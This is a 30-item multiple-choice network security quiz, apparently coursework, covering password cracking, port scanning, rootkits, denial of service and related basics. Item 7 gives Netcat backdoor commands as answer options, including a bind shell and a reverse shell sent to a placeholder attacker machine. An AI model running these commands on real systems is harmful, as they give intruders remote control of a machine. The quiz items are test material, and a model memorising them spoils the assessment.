NVST quiz 6 (151- 180)

1.

1 point

A password cracker is needed to quickly rediscover a password. It is believed the password is only seven characters long, but was computer generated. Which of the following techniques would be the best method to use?

Brute force

Dictionary

Hybrid

Online guessing

2.

1 point

In order to determine which class any IP address is in, one should examine the first _____ bits of the IP address.

3 bits

4 bits

5 bits

8 bits

3.

1 point

_______ is the method used by Nmap to determine the operating system of the target comptuer.

OS stamping

Banner stamping

OS fingerprinting

Stack fingerprinting

4.

1 point

Which of the following software is a good port scanning tool?

Telnet

ipconfig

portscan

Nmap

5.

1 point

Each of the following is an attribute that should be compiled for hardware when performing an asset identification except __________.

the name of the equipment

the MAC and IP address

the manufacturer's serial number

the cost

6.

1 point

Which of the following is Not a functional feature of Kernel-Mode Rootkits?

Hide an attacker's processes.

Hide the ports used by an attacker.

Hide selected types of events from the Windows Event Viewer.

Hide device drivers, including itself, so an administrator cannot see them installed on the system.

7.

1 point

Which Netcat command is used as a backdoor on window systems?

c:\>nc -l -p 12345 -e ncrelay.bat

c:\>nc -l -p 12345 -e cmd.exe

c:\>nc -l -p 12345 -e /bin/sh

c:\>nc [attackers_machine] 12345 -e /bin/sh

8.

1 point

You are connected to a server on the Internet and you click on a link on the server and receive a time-out message. What layer could be the cause of this message?

Application

Physical

Network

Transport

9.

1 point

Each of the following is a characteristic of information except __________.

confidentiality

integrity

availability

conformity

10.

1 point

Which of the following is not a feature or capability of a port scanner?

Determine open ports

Determine weakness of OS

Determine active services

Determine target OS

11.

1 point

Which software is used to extract password representations?

Brutus

Cracker

John the Ripper

Pwdump3

12.

1 point

During an audit of a server system log, which of the following entries would be considered a possible security threat?

A 500K print job sent to a printer.

Three new files saved in the accounting folder by user finance.

Five failed login attempts on an admin account.

Two successful logins with the backup account

13.

1 point

A person wishing to prevent users from accessing a web server and the information on it would try a ____ attack.

system service

internet service

web service

denial of service

14.

1 point

For Dos (Denial-of-Service) Attack, Stopping service can be achieved by:
i. Process killing
ii. Process crashing
iii. System reconfiguring
iv. Malformed packet attacks

i, iii and iv

i, ii and iv

i, ii and iii

i, ii, iii and iv

15.

1 point

_______ is the interception of network data not intended for the machine that is intercepting the traffic.

Packet engineering

Packet spoofing

Packet sniffing

Packet stealing

16.

1 point

HTTP, FTP and Telnet work at which layer of the OSI model?

Session

Application

Transport

Presentation

17.

1 point

Which of the following is not a well known TCP port number?

53

8888

25

80

18.

1 point

Which type of Buffer Overflow Exploits will cause the operating system to shutdown or crash?

Memory buffer Overflow

Program Buffer Overflow

Stack-based Buffer Overflow

Heap Overflow

19.

1 point

Metasploit offers a huge set of _____, that is, the code the attacker wants to run on the target machine, triggered by the exploit itself.

options

payloads

utilities

exploits

20.

1 point

Which of the following is a weak password policy?

use minimum of nine alphanumeric characters

use passphrases

implement aging password

use dictionary form password

21.

1 point

Which software tool can be used for sniffing password?

John the Sniffer

Cain

John the Ripper

Brutus

22.

1 point

The use of Domain Name System (DNS) is to _________.

translate IP address into its appropriate computer's domain name.

translate computer's IP address into its approprate MAC address.

check for the correct computer's domain name.

translate computer's domain name into its appropriate IP address.

23.

1 point

Internet is “managed” by

AfriNIC

ICANN

ARIN

APNIC

24.

1 point

Attackers known as ____________ like to think of themselves as an elite group who are performing a valuable service in identifying security weaknesses.

hackers

crackers

script kiddies

cyberterrorists

25.

1 point

Which application-level Trojan backdoor is able to modify or replace critical operating system executable programs or libraries?

Operating-Mode Rootkits

System-Mode Rootkits

User-Mode Rootkits

Kernel-Mode Rootkits

26.

1 point

The following are useful data elements from the Registrar of Whois Search except _______.

Registration dates

Names

Hardware models

Name servers

27.

1 point

In TCP header, there are TCP control bits, also know as the TCP flags.

8

6

9

7

28.

1 point

Which of the following is NOT a countermeasures for password attack?

conduct password cracking tests.

adopt a strong password policy.

educate user to security awareness.

store encrypted or hashed password files in user account.

29.

1 point

What is the purpose of a site survey?

Plan the design of a wired network

Improve wireless signal strength

Distribute WEP keys

Eliminate unwanted access locations

30.

1 point

An attacker with low skill level is called?

Hacker

Script Kiddie

Cracker

Phreaker